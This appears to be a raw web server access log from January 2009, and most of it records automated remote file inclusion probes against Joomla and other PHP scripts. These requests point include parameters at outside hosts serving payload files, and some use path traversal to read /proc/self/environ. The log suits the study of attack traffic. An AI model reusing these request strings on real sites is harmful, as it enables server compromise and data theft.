207.182.137.218 - - [06/Jan/2009:08:39:31 -0800] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/sarahvirna/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:39:31 -0800] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/sarahvirna/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:08:39:47 -0800] "GET /logs/access_080927.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.87.116 - - [06/Jan/2009:08:39:48 -0800] "GET /?show=gallery&pageid=17&nggpage=3 HTTP/1.0" 200 158774 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
132.247.8.18 - - [06/Jan/2009:08:39:50 -0800] "GET /classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:39:50 -0800] "GET /logs/access_080201.log/index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:08:39:51 -0800] "GET /logs/access_081015.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:08:40:02 -0800] "GET /logs//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://prwa-ct.org/calendar_events//tools/raid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:40:07 -0800] "GET /logs/access_080127.log/index.php?option=com_magazine&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:40:08 -0800] "GET /index.php?option=com_magazine&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95162 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:40:08 -0800] "GET /logs/index.php?option=com_magazine&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:40:20 -0800] "GET /logs/access_081017.log/index.php?option=com_joomlalib&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:40:20 -0800] "GET /index.php?option=com_joomlalib&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95169 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:40:21 -0800] "GET /logs/index.php?option=com_joomlalib&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.109.196 - - [06/Jan/2009:08:41:13 -0800] "GET /blog/index.php/category/motorcycles/?show=gallery&nggpage=20 HTTP/1.0" 200 113014 "http://search.live.com/results.aspx?q=motorcycles" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.196 - - [06/Jan/2009:08:41:14 -0800] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/index.php/category/motorcycles/?show=gallery&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.196 - - [06/Jan/2009:08:41:14 -0800] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/index.php/category/motorcycles/?show=gallery&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.196 - - [06/Jan/2009:08:41:15 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/index.php/category/motorcycles/?show=gallery&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.196 - - [06/Jan/2009:08:41:15 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://dmulk.com/blog/index.php/category/motorcycles/?show=gallery&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.196 - - [06/Jan/2009:08:41:15 -0800] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://dmulk.com/blog/index.php/category/motorcycles/?show=gallery&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.196 - - [06/Jan/2009:08:41:16 -0800] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://dmulk.com/blog/index.php/category/motorcycles/?show=gallery&nggpage=20" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:41:20 -0800] "GET /logs/access_080824.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:41:37 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:41:43 -0800] "GET /logs/access_081015.log/index.php?option=com_joomlalib&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.213.164.118 - - [06/Jan/2009:08:41:53 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.39.182.49 - - [06/Jan/2009:08:42:08 -0800] "GET /classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.geocities.com/cwx.shadow/idx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.39.182.49 - - [06/Jan/2009:08:42:08 -0800] "GET /logs//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.geocities.com/cwx.shadow/idx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.39.182.49 - - [06/Jan/2009:08:42:08 -0800] "GET /logs/access_080927.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.geocities.com/cwx.shadow/idx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.39.182.49 - - [06/Jan/2009:08:42:09 -0800] "GET /logs/access_081015.log//classifieds/posts/ads/events/images/buy/sell/trade/real_estate/apartments/personals/dating/socialnetworking.php?=http://www.geocities.com/cwx.shadow/idx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:42:35 -0800] "GET /logs/access_071209.log/index.php?option=com_magazine&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:43:17 -0800] "GET /logs/access_080530.log//modules/vwar/admin/admin.php?vwar_root=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:43:17 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:43:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:43:19 -0800] "GET /logs/access_080626.log/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:43:25 -0800] "GET /services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:43:26 -0800] "GET /logs/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:33 -0800] "GET /logs/access_081108.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:33 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:33 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:33 -0800] "GET /logs/access_081108.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:33 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:33 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:34 -0800] "GET /logs/access_081108.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:34 -0800] "GET /logs/access_081108.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:43:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:43:37 -0800] "GET /logs/access_080513.log//modules/vwar/admin/admin.php?vwar_root=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:43:41 -0800] "GET /logs/access_080226.log/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.174.68.56 - - [06/Jan/2009:08:43:46 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://fuckserv.net/id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:43:52 -0800] "GET /logs/access_080610.log/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:43:52 -0800] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:43:52 -0800] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:43:54 -0800] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:44:01 -0800] "GET /logs/access_080610.log/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:44:01 -0800] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:44:01 -0800] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:44:06 -0800] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:44:12 -0800] "GET /logs/access_080626.log/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:44:15 -0800] "GET /services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:44:17 -0800] "GET /logs/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:44:23 -0800] "GET /logs/access_080627.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:44:24 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:44:24 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:44:26 -0800] "GET /logs/access_080627.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:44:26 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:08:44:27 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:44:33 -0800] "GET /logs/access_080226.log/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:44:37 -0800] "GET /logs//?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 200 81177 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:44:39 -0800] "GET /?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 200 94887 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.81.169 - - [06/Jan/2009:08:45:03 -0800] "GET /logs/access_080313.log HTTP/1.0" 200 491234 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:45:20 -0800] "GET /logs//?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 200 81177 "-" "libwww-perl/5.803" "www.dmulk.com"
85.14.221.111 - - [06/Jan/2009:08:45:22 -0800] "GET /?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/vwar/%20/.../%20/mraneti.txt??? HTTP/1.1" 200 94871 "-" "libwww-perl/5.803" "www.dmulk.com"
82.228.186.94 - - [06/Jan/2009:08:45:39 -0800] "GET /logs/access_081114.log//modules/vwar/admin/admin.php?vwar_root=http://deblaterer.com/themes/AstroGlobes/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.228.186.94 - - [06/Jan/2009:08:45:39 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://deblaterer.com/themes/AstroGlobes/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.228.186.94 - - [06/Jan/2009:08:45:40 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://deblaterer.com/themes/AstroGlobes/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:45:42 -0800] "GET /logs/access_080422.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.228.186.94 - - [06/Jan/2009:08:45:45 -0800] "GET /logs/access_081118.log//modules/vwar/admin/admin.php?vwar_root=http://deblaterer.com/themes/AstroGlobes/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:45:54 -0800] "GET /logs/index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:45:56 -0800] "GET /index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95176 "-" "libwww-perl/5.810" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:46:06 -0800] "GET /logs/access_080716.log//includes/settings.inc.php?include_path=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:46:06 -0800] "GET /includes/settings.inc.php?include_path=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:46:06 -0800] "GET /logs/access_080912.log//includes/settings.inc.php?include_path=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.236.53.4 - - [06/Jan/2009:08:46:06 -0800] "GET /logs//includes/settings.inc.php?include_path=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:46:59 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:46:59 -0800] "GET /logs/access_080819.log%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:46:59 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.253.142.219 - - [06/Jan/2009:08:47:15 -0800] "GET /logs/access_081114.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/COPYING.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:47:15 -0800] "GET /logs/access_081207.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:47:15 -0800] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:47:15 -0800] "GET /logs/access_081207.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
84.253.142.219 - - [06/Jan/2009:08:47:15 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/COPYING.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:47:15 -0800] "GET /logs/access_081207.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
203.246.75.102 - - [06/Jan/2009:08:47:16 -0800] "GET /logs/access_081207.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
84.253.142.219 - - [06/Jan/2009:08:47:16 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.lph.go.th/main/SBU/RenovateWeb//appserv/COPYING.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:47:27 -0800] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:47:36 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.101.68.240 - - [06/Jan/2009:08:47:49 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://thelo.fileave.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:08:47:49 -0800] "GET /logs/access_080819.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.101.68.240 - - [06/Jan/2009:08:47:50 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://thelo.fileave.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:48:12 -0800] "GET /htmltonuke.php?filnavn=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
